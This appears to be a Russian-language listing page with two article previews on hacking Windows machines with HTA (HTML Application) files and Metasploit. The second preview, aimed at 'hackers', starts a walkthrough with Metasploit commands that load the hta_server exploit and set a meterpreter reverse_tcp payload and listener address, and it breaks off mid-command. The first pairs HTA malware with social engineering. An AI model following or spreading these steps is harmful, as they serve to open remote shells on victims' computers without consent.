172 прочтения · 6 лет назад
Малварь на HTML и получения сессии через Meterpreter Listener
В этой статье разберем возможность создания вредоносных приложений на HTMl. С помощью подготовленных файлов с расширением .hta можно получать доступ к машинам совместно с знаниями социальной инженерии. Также рассмотрим как можно скомпилировать файл, чтобы запустить meterpreter сессию. Теория HTML - язык гипертекстовой разметки текстов и не является языком программирования, но в Windows есть технология браузерного взаимодействия с документами /html. Это технология известная под названием HTML Application(HTA)...
12 прочтений · 4 года назад
Взлом удаленного компьютера
Взлом удаленного компьютера DWNMay 20, 2019 Приветствую хацкеры в сегодняшней статье я хочу показать взлом удаленного компьютера, а точнее, получение сессии meterpreter c помощью эксплойта - hta_server. Появился он недавно в версии Metasploit Framework v4.12.34,так, что прежде чем начать убеждаемся в ее наличии, если отсутствует, обновляемся: > apt-get update && apt-get upgrade –y && apt-get dist-upgrade Запускаем Metasploit Framework: > msfconsole В появившейся консоли фреймворка пишем: Код: use exploit/windows/misc/hta_server set payload /windows/meterpreter/reverse_tcp set LHOST 172...